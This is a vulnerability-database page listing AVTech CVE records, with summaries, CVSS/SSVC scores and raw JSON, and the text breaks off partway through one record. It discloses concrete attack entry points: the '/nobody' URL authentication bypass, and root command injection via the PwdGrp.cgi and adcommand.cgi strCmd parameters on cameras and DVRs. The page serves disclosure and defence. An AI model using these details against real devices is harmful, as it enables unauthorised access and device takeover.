Search
Find a vulnerability
Search criteria
ⓘ
Use this form to refine search results.
Full-text search supports keyword queries with ranking and filtering.
You can combine vendor, product, and sources to narrow results.
Enable “Apply ordering” to sort by date instead of relevance.
47 vulnerabilities by AVTech
CVE-2025-50944 (GCVE-0-2025-50944)
Vulnerability from cvelistv5 – Published: 2025-09-15 00:00 – Updated: 2025-09-15 14:26
VLAI
Summary
An issue was discovered in the method push.lite.avtech.com.MySSLSocketFactoryNew.checkServerTrusted in AVTECH EagleEyes 2.0.0. The custom X509TrustManager used in checkServerTrusted only checks the certificate's expiration date, skipping proper TLS chain validation.
Severity
8.8 (High)
SSVC
Exploitation: poc
Automatable: no
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- n/a
- CWE-295 - Improper Certificate Validation
Assigner
References
2 references
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 8.8,
"baseSeverity": "HIGH",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "REQUIRED",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:R/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-50944",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-15T14:23:22.625287Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-295",
"description": "CWE-295 Improper Certificate Validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-15T14:26:24.185Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in the method push.lite.avtech.com.MySSLSocketFactoryNew.checkServerTrusted in AVTECH EagleEyes 2.0.0. The custom X509TrustManager used in checkServerTrusted only checks the certificate\u0027s expiration date, skipping proper TLS chain validation."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-15T13:57:13.448Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://shinycolumn.notion.site/eagleeyes-lite"
},
{
"url": "https://github.com/shinyColumn/CVE-2025-50944"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-50944",
"datePublished": "2025-09-15T00:00:00.000Z",
"dateReserved": "2025-06-16T00:00:00.000Z",
"dateUpdated": "2025-09-15T14:26:24.185Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-46408 (GCVE-0-2025-46408)
Vulnerability from cvelistv5 – Published: 2025-09-15 00:00 – Updated: 2025-09-17 13:40
VLAI
Summary
An issue was discovered in the methods push.lite.avtech.com.AvtechLib.GetHttpsResponse and push.lite.avtech.com.Push_HttpService.getNewHttpClient in AVTECH EagleEyes 2.0.0. The methods set ALLOW_ALL_HOSTNAME_VERIFIER, bypassing domain validation.
Severity
9.8 (Critical)
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
- n/a
- CWE-297 - Improper Validation of Certificate with Host Mismatch
Assigner
References
1 reference
{
"containers": {
"adp": [
{
"metrics": [
{
"cvssV3_1": {
"attackComplexity": "LOW",
"attackVector": "NETWORK",
"availabilityImpact": "HIGH",
"baseScore": 9.8,
"baseSeverity": "CRITICAL",
"confidentialityImpact": "HIGH",
"integrityImpact": "HIGH",
"privilegesRequired": "NONE",
"scope": "UNCHANGED",
"userInteraction": "NONE",
"vectorString": "CVSS:3.1/AV:N/AC:L/PR:N/UI:N/S:U/C:H/I:H/A:H",
"version": "3.1"
}
},
{
"other": {
"content": {
"id": "CVE-2025-46408",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-09-17T13:40:02.640558Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-297",
"description": "CWE-297 Improper Validation of Certificate with Host Mismatch",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-17T13:40:32.675Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://github.com/shinyColumn/CVE-2025-46408"
}
],
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"product": "n/a",
"vendor": "n/a",
"versions": [
{
"status": "affected",
"version": "n/a"
}
]
}
],
"descriptions": [
{
"lang": "en",
"value": "An issue was discovered in the methods push.lite.avtech.com.AvtechLib.GetHttpsResponse and push.lite.avtech.com.Push_HttpService.getNewHttpClient in AVTECH EagleEyes 2.0.0. The methods set ALLOW_ALL_HOSTNAME_VERIFIER, bypassing domain validation."
}
],
"problemTypes": [
{
"descriptions": [
{
"description": "n/a",
"lang": "en",
"type": "text"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2025-09-15T14:09:17.865Z",
"orgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"shortName": "mitre"
},
"references": [
{
"url": "https://github.com/shinyColumn/CVE-2025-46408"
}
]
}
},
"cveMetadata": {
"assignerOrgId": "8254265b-2729-46b6-b9e3-3dfca2d5bfca",
"assignerShortName": "mitre",
"cveId": "CVE-2025-46408",
"datePublished": "2025-09-15T00:00:00.000Z",
"dateReserved": "2025-07-11T00:00:00.000Z",
"dateUpdated": "2025-09-17T13:40:32.675Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.1"
}
CVE-2025-34066 (GCVE-0-2025-34066)
Vulnerability from cvelistv5 – Published: 2025-07-01 14:47 – Updated: 2026-04-07 14:09
VLAI
Title
AVTECH IP camera, DVR, and NVR Devices Unauthenticated Information Disclosure
Summary
An improper certificate validation vulnerability exists in AVTECH IP cameras, DVRs, and NVRs due to the use of wget with --no-check-certificate in scripts like SyncCloudAccount.sh and SyncPermit.sh. This exposes HTTPS communications to man-in-the-middle (MITM) attacks.
Severity
SSVC
Exploitation: poc
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-295 - Improper Certificate Validation
Assigner
References
5 references
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/40500 | exploit |
| https://avtech.com/ | product |
| https://web.archive.org/web/20240810225729/https:… | third-party-advisorytechnical-description |
| https://web.archive.org/web/20161029201749/https:… | exploit |
| https://vulncheck.com/advisories/avtech-ipcamera-… | third-party-advisory |
Impacted products
3 products
| Vendor | Product | Version | |
|---|---|---|---|
| AVTECH | IP cameras |
Affected:
0
|
|
| AVTECH | DVR devices |
Affected:
0
|
|
| AVTECH | NVR devices |
Affected:
0
|
Date Public
2016-10-11 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34066",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-01T18:37:09.538771Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-01T18:37:36.761Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"Cloud sync shell scripts",
"--no-check-certificate (hardcoded)"
],
"product": "IP cameras",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "0"
}
]
},
{
"defaultStatus": "unaffected",
"modules": [
"Cloud sync shell scripts",
"--no-check-certificate (hardcoded)"
],
"product": "DVR devices",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "0"
}
]
},
{
"defaultStatus": "unaffected",
"modules": [
"Cloud sync shell scripts",
"--no-check-certificate (hardcoded)"
],
"product": "NVR devices",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "0"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Gergely Eberhardt (SEARCH-LAB.hu)"
}
],
"datePublic": "2016-10-11T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An improper certificate validation vulnerability exists in AVTECH IP cameras, DVRs, and NVRs due to the use of wget with --no-check-certificate in scripts like SyncCloudAccount.sh and SyncPermit.sh. This exposes HTTPS communications to man-in-the-middle (MITM) attacks."
}
],
"value": "An improper certificate validation vulnerability exists in AVTECH IP cameras, DVRs, and NVRs due to the use of wget with --no-check-certificate in scripts like SyncCloudAccount.sh and SyncPermit.sh. This exposes HTTPS communications to man-in-the-middle (MITM) attacks."
}
],
"impacts": [
{
"capecId": "CAPEC-94",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-94 Adversary in the Middle (AiTM)"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "PRESENT",
"attackVector": "NETWORK",
"baseScore": 8.3,
"baseSeverity": "HIGH",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:P/PR:N/UI:N/VC:H/VI:L/VA:L/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-295",
"description": "CWE-295 Improper Certificate Validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T14:09:19.390Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/40500"
},
{
"tags": [
"product"
],
"url": "https://avtech.com/"
},
{
"tags": [
"third-party-advisory",
"technical-description"
],
"url": "https://web.archive.org/web/20240810225729/https://www.search-lab.hu/advisories/126-AVTech-devices-multiple-vulnerabilities"
},
{
"tags": [
"exploit"
],
"url": "https://web.archive.org/web/20161029201749/https://github.com/ebux/AVTECH"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://vulncheck.com/advisories/avtech-ipcamera-nvr-dvr-mulitple-vulns"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "AVTECH IP camera, DVR, and NVR Devices Unauthenticated Information Disclosure",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34066",
"datePublished": "2025-07-01T14:47:44.573Z",
"dateReserved": "2025-04-15T19:15:22.549Z",
"dateUpdated": "2026-04-07T14:09:19.390Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34065 (GCVE-0-2025-34065)
Vulnerability from cvelistv5 – Published: 2025-07-01 14:47 – Updated: 2026-04-07 14:09
VLAI
Title
AVTECH IP camera, DVR, and NVR Devices Authentication Bypass via /nobody URL Path
Summary
An authentication bypass vulnerability exists in AVTECH IP camera, DVR, and NVR devices’ streamd web server. The strstr() function allows unauthenticated access to any request containing "/nobody" in the URL, bypassing login controls.
Severity
SSVC
Exploitation: poc
Automatable: no
Technical Impact: partial
CISA Coordinator (v2.0.3)
CWE
- CWE-290 - Authentication Bypass by Spoofing
Assigner
References
5 references
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/40500 | exploit |
| https://avtech.com/ | product |
| https://web.archive.org/web/20240810225729/https:… | third-party-advisorytechnical-description |
| https://web.archive.org/web/20161029201749/https:… | exploit |
| https://vulncheck.com/advisories/avtech-ipcamera-… | third-party-advisory |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| AVTECH | IP camera, DVR, and NVR Devices |
Affected:
1000-1000-1000-1000
Affected: 1000C-1000C-1000C-1000C Affected: 1001-1000-1000-1000 Affected: 1001-1001-1000-1000 Affected: 1002-1000-1000-1000 Affected: 1002-1002-1000-1002 Affected: 1002D-1000D-1000D-1000D Affected: 1003-1000-1000-1001 Affected: 1003-1001-1001-1000 Affected: 1003-1002-1001-1000 Affected: 1004-1000-1000-1000 Affected: 1004-1001-1001-1001 Affected: 1004-1002-1000-1001 Affected: 1004-1003-1001-1002 Affected: 1004-1003-1002-1001 Affected: 1004A-1001A-1002A-1000A Affected: 1005-1002-1001-1002 Affected: 1005-1003-1001-1002 Affected: 1005-1004-1002-1001 Affected: 1005A-1001A-1002A-1001A Affected: 1005D-1001D-1002D-1001D Affected: 1006-1002-1001-1002 Affected: 1006-1003-1001-1001 Affected: 1006-1004-1003-1001 Affected: 1007-1001-1003-1001 Affected: 1007-1001-1004-1003 Affected: 1007-1002-1001-1000 Affected: 1007-1002-1001-1003 Affected: 1007-1002-1003-1002 Affected: 1007-1004-1003-1001 Affected: 1008-1001-1003-1002 Affected: 1008-1004-1004-1001 Affected: 1008D-1003D-1004D-1002D Affected: 1008J-1004J-1004J-1001J Affected: 1009-1001-1004-1001 Affected: 1009-1002-1005-1003 Affected: 1009-1003-1001-1003 Affected: 1009-1003-1005-1002 Affected: 1010-1001-1004-1001 Affected: 1010-1001-1004-1002 Affected: 1010-1003-1005-1002 Affected: 1010-1003-1006-1003 Affected: 1010-1003-1006-1004 Affected: 1010-1004-1007-1001 Affected: 1010J-1001J-1004J-1001J Affected: 1010N-1003N-1005N-1002N Affected: 1011-1001-1002A-1002 Affected: 1011-1001-1002D-1002 Affected: 1011-1001-1003-1002 Affected: 1011-1001-1004-1002 Affected: 1011-1001-1005-1002 Affected: 1011-1004-1005-1002 |
Date Public
2016-10-11 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34065",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "no"
},
{
"Technical Impact": "partial"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-01T18:35:32.244766Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-01T18:36:04.496Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"Search.cgi",
"username parameter",
"queryb64str"
],
"product": "IP camera, DVR, and NVR Devices",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "1000-1000-1000-1000"
},
{
"status": "affected",
"version": "1000C-1000C-1000C-1000C"
},
{
"status": "affected",
"version": "1001-1000-1000-1000"
},
{
"status": "affected",
"version": "1001-1001-1000-1000"
},
{
"status": "affected",
"version": "1002-1000-1000-1000"
},
{
"status": "affected",
"version": "1002-1002-1000-1002"
},
{
"status": "affected",
"version": "1002D-1000D-1000D-1000D"
},
{
"status": "affected",
"version": "1003-1000-1000-1001"
},
{
"status": "affected",
"version": "1003-1001-1001-1000"
},
{
"status": "affected",
"version": "1003-1002-1001-1000"
},
{
"status": "affected",
"version": "1004-1000-1000-1000"
},
{
"status": "affected",
"version": "1004-1001-1001-1001"
},
{
"status": "affected",
"version": "1004-1002-1000-1001"
},
{
"status": "affected",
"version": "1004-1003-1001-1002"
},
{
"status": "affected",
"version": "1004-1003-1002-1001"
},
{
"status": "affected",
"version": "1004A-1001A-1002A-1000A"
},
{
"status": "affected",
"version": "1005-1002-1001-1002"
},
{
"status": "affected",
"version": "1005-1003-1001-1002"
},
{
"status": "affected",
"version": "1005-1004-1002-1001"
},
{
"status": "affected",
"version": "1005A-1001A-1002A-1001A"
},
{
"status": "affected",
"version": "1005D-1001D-1002D-1001D"
},
{
"status": "affected",
"version": "1006-1002-1001-1002"
},
{
"status": "affected",
"version": "1006-1003-1001-1001"
},
{
"status": "affected",
"version": "1006-1004-1003-1001"
},
{
"status": "affected",
"version": "1007-1001-1003-1001"
},
{
"status": "affected",
"version": "1007-1001-1004-1003"
},
{
"status": "affected",
"version": "1007-1002-1001-1000"
},
{
"status": "affected",
"version": "1007-1002-1001-1003"
},
{
"status": "affected",
"version": "1007-1002-1003-1002"
},
{
"status": "affected",
"version": "1007-1004-1003-1001"
},
{
"status": "affected",
"version": "1008-1001-1003-1002"
},
{
"status": "affected",
"version": "1008-1004-1004-1001"
},
{
"status": "affected",
"version": "1008D-1003D-1004D-1002D"
},
{
"status": "affected",
"version": "1008J-1004J-1004J-1001J"
},
{
"status": "affected",
"version": "1009-1001-1004-1001"
},
{
"status": "affected",
"version": "1009-1002-1005-1003"
},
{
"status": "affected",
"version": "1009-1003-1001-1003"
},
{
"status": "affected",
"version": "1009-1003-1005-1002"
},
{
"status": "affected",
"version": "1010-1001-1004-1001"
},
{
"status": "affected",
"version": "1010-1001-1004-1002"
},
{
"status": "affected",
"version": "1010-1003-1005-1002"
},
{
"status": "affected",
"version": "1010-1003-1006-1003"
},
{
"status": "affected",
"version": "1010-1003-1006-1004"
},
{
"status": "affected",
"version": "1010-1004-1007-1001"
},
{
"status": "affected",
"version": "1010J-1001J-1004J-1001J"
},
{
"status": "affected",
"version": "1010N-1003N-1005N-1002N"
},
{
"status": "affected",
"version": "1011-1001-1002A-1002"
},
{
"status": "affected",
"version": "1011-1001-1002D-1002"
},
{
"status": "affected",
"version": "1011-1001-1003-1002"
},
{
"status": "affected",
"version": "1011-1001-1004-1002"
},
{
"status": "affected",
"version": "1011-1001-1005-1002"
},
{
"status": "affected",
"version": "1011-1004-1005-1002"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Gergely Eberhardt (SEARCH-LAB.hu)"
}
],
"datePublic": "2016-10-11T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An authentication bypass vulnerability exists in AVTECH IP camera, DVR, and NVR devices\u2019 streamd web server. The strstr() function allows unauthenticated access to any request containing \"/nobody\" in the URL, bypassing login controls."
}
],
"value": "An authentication bypass vulnerability exists in AVTECH IP camera, DVR, and NVR devices\u2019 streamd web server. The strstr() function allows unauthenticated access to any request containing \"/nobody\" in the URL, bypassing login controls."
}
],
"impacts": [
{
"capecId": "CAPEC-115",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-115 Authentication Bypass"
}
]
},
{
"capecId": "CAPEC-137",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-137 Parameter Injection"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 6.9,
"baseSeverity": "MEDIUM",
"privilegesRequired": "NONE",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "NONE",
"subConfidentialityImpact": "NONE",
"subIntegrityImpact": "NONE",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:N/UI:N/VC:L/VI:L/VA:L/SC:N/SI:N/SA:N",
"version": "4.0",
"vulnAvailabilityImpact": "LOW",
"vulnConfidentialityImpact": "LOW",
"vulnIntegrityImpact": "LOW",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-290",
"description": "CWE-290 Authentication Bypass by Spoofing",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T14:09:18.570Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/40500"
},
{
"tags": [
"product"
],
"url": "https://avtech.com/"
},
{
"tags": [
"third-party-advisory",
"technical-description"
],
"url": "https://web.archive.org/web/20240810225729/https://www.search-lab.hu/advisories/126-AVTech-devices-multiple-vulnerabilities"
},
{
"tags": [
"exploit"
],
"url": "https://web.archive.org/web/20161029201749/https://github.com/ebux/AVTECH"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://vulncheck.com/advisories/avtech-ipcamera-nvr-dvr-mulitple-vulns"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "AVTECH IP camera, DVR, and NVR Devices Authentication Bypass via /nobody URL Path",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34065",
"datePublished": "2025-07-01T14:47:23.621Z",
"dateReserved": "2025-04-15T19:15:22.549Z",
"dateUpdated": "2026-04-07T14:09:18.570Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34056 (GCVE-0-2025-34056)
Vulnerability from cvelistv5 – Published: 2025-07-01 14:46 – Updated: 2026-04-07 14:09
VLAI
Title
AVTECH IP camera, DVR, and NVR Devices Authenticated Root Command Execution
Summary
An OS command injection vulnerability exists in AVTECH IP camera, DVR, and NVR devices via the PwdGrp.cgi endpoint, which handles user and group management operations. Authenticated users can supply input through the pwd or grp parameters, which are directly embedded into system commands without proper sanitation. This allows for the execution of arbitrary shell commands with root privileges.
Severity
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
Assigner
References
5 references
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/40500 | exploit |
| https://avtech.com/ | product |
| https://web.archive.org/web/20240810225729/https:… | third-party-advisorytechnical-description |
| https://web.archive.org/web/20161029201749/https:… | exploit |
| https://vulncheck.com/advisories/avtech-ipcamera-… | third-party-advisory |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| AVTECH | IP camera, DVR, and NVR Devices |
Affected:
0
|
Date Public
2016-10-11 00:00
Credits
{
"containers": {
"adp": [
{
"metrics": [
{
"other": {
"content": {
"id": "CVE-2025-34056",
"options": [
{
"Exploitation": "poc"
},
{
"Automatable": "yes"
},
{
"Technical Impact": "total"
}
],
"role": "CISA Coordinator",
"timestamp": "2025-07-01T18:34:24.733333Z",
"version": "2.0.3"
},
"type": "ssvc"
}
}
],
"providerMetadata": {
"dateUpdated": "2025-07-01T18:34:41.482Z",
"orgId": "134c704f-9b21-4f2e-91b3-4a467353bcc0",
"shortName": "CISA-ADP"
},
"title": "CISA ADP Vulnrichment"
}
],
"cna": {
"affected": [
{
"defaultStatus": "unaffected",
"modules": [
"PwdGrp.cgi user/group configuration handler",
"pwd parameter",
"grp parameter"
],
"product": "IP camera, DVR, and NVR Devices",
"vendor": "AVTECH",
"versions": [
{
"status": "affected",
"version": "0"
}
]
}
],
"credits": [
{
"lang": "en",
"type": "finder",
"value": "Gergely Eberhardt (SEARCH-LAB.hu)"
}
],
"datePublic": "2016-10-11T00:00:00.000Z",
"descriptions": [
{
"lang": "en",
"supportingMedia": [
{
"base64": false,
"type": "text/html",
"value": "An OS command injection vulnerability exists in AVTECH IP camera, DVR, and NVR devices via the \u003ccode\u003ePwdGrp.cgi\u003c/code\u003e endpoint, which handles user and group management operations. Authenticated users can supply input through the \u003ccode\u003epwd\u003c/code\u003e or \u003ccode\u003egrp\u003c/code\u003e parameters, which are directly embedded into system commands without proper sanitation. This allows for the execution of arbitrary shell commands with root privileges."
}
],
"value": "An OS command injection vulnerability exists in AVTECH IP camera, DVR, and NVR devices via the PwdGrp.cgi endpoint, which handles user and group management operations. Authenticated users can supply input through the pwd or grp parameters, which are directly embedded into system commands without proper sanitation. This allows for the execution of arbitrary shell commands with root privileges."
}
],
"impacts": [
{
"capecId": "CAPEC-88",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-88 OS Command Injection"
}
]
},
{
"capecId": "CAPEC-137",
"descriptions": [
{
"lang": "en",
"value": "CAPEC-137 Parameter Injection"
}
]
}
],
"metrics": [
{
"cvssV4_0": {
"Automatable": "NOT_DEFINED",
"Recovery": "NOT_DEFINED",
"Safety": "NOT_DEFINED",
"attackComplexity": "LOW",
"attackRequirements": "NONE",
"attackVector": "NETWORK",
"baseScore": 9.4,
"baseSeverity": "CRITICAL",
"privilegesRequired": "LOW",
"providerUrgency": "NOT_DEFINED",
"subAvailabilityImpact": "HIGH",
"subConfidentialityImpact": "HIGH",
"subIntegrityImpact": "HIGH",
"userInteraction": "NONE",
"valueDensity": "NOT_DEFINED",
"vectorString": "CVSS:4.0/AV:N/AC:L/AT:N/PR:L/UI:N/VC:H/VI:H/VA:H/SC:H/SI:H/SA:H",
"version": "4.0",
"vulnAvailabilityImpact": "HIGH",
"vulnConfidentialityImpact": "HIGH",
"vulnIntegrityImpact": "HIGH",
"vulnerabilityResponseEffort": "NOT_DEFINED"
},
"format": "CVSS",
"scenarios": [
{
"lang": "en",
"value": "GENERAL"
}
]
}
],
"problemTypes": [
{
"descriptions": [
{
"cweId": "CWE-78",
"description": "CWE-78 Improper Neutralization of Special Elements used in an OS Command (\u0027OS Command Injection\u0027)",
"lang": "en",
"type": "CWE"
}
]
},
{
"descriptions": [
{
"cweId": "CWE-20",
"description": "CWE-20 Improper Input Validation",
"lang": "en",
"type": "CWE"
}
]
}
],
"providerMetadata": {
"dateUpdated": "2026-04-07T14:09:17.710Z",
"orgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"shortName": "VulnCheck"
},
"references": [
{
"tags": [
"exploit"
],
"url": "https://www.exploit-db.com/exploits/40500"
},
{
"tags": [
"product"
],
"url": "https://avtech.com/"
},
{
"tags": [
"third-party-advisory",
"technical-description"
],
"url": "https://web.archive.org/web/20240810225729/https://www.search-lab.hu/advisories/126-AVTech-devices-multiple-vulnerabilities"
},
{
"tags": [
"exploit"
],
"url": "https://web.archive.org/web/20161029201749/https://github.com/ebux/AVTECH"
},
{
"tags": [
"third-party-advisory"
],
"url": "https://vulncheck.com/advisories/avtech-ipcamera-nvr-dvr-mulitple-vulns"
}
],
"source": {
"discovery": "UNKNOWN"
},
"title": "AVTECH IP camera, DVR, and NVR Devices Authenticated Root Command Execution",
"x_generator": {
"engine": "Vulnogram 0.2.0"
}
}
},
"cveMetadata": {
"assignerOrgId": "83251b91-4cc7-4094-a5c7-464a1b83ea10",
"assignerShortName": "VulnCheck",
"cveId": "CVE-2025-34056",
"datePublished": "2025-07-01T14:46:52.800Z",
"dateReserved": "2025-04-15T19:15:22.549Z",
"dateUpdated": "2026-04-07T14:09:17.710Z",
"state": "PUBLISHED"
},
"dataType": "CVE_RECORD",
"dataVersion": "5.2"
}
CVE-2025-34055 (GCVE-0-2025-34055)
Vulnerability from cvelistv5 – Published: 2025-07-01 14:46 – Updated: 2026-04-07 14:09
VLAI
Title
AVTECH IP camera, DVR, and NVR Devices Authenticated Root Command Execution
Summary
An OS command injection vulnerability exists in AVTECH DVR, NVR, and IP camera devices within the adcommand.cgi endpoint, which interfaces with the ActionD daemon. Authenticated users can invoke the DoShellCmd operation, passing arbitrary input via the strCmd parameter. This input is executed directly by the system shell without sanitation allowing attackers to execute commands as the root user.
Severity
SSVC
Exploitation: poc
Automatable: yes
Technical Impact: total
CISA Coordinator (v2.0.3)
CWE
Assigner
References
5 references
| URL | Tags |
|---|---|
| https://www.exploit-db.com/exploits/40500 | exploit |
| https://avtech.com/ | product |
| https://web.archive.org/web/20240810225729/https:… | third-party-advisorytechnical-description |
| https://web.archive.org/web/20161029201749/https:… | exploit |
| https://vulncheck.com/advisories/avtech-ipcamera-… | third-party-advisory |
Impacted products
1 product
| Vendor | Product | Version | |
|---|---|---|---|
| AVTECH | IP camera, DVR, and NVR Devices |
Affected:
1001-1000-1000-1000
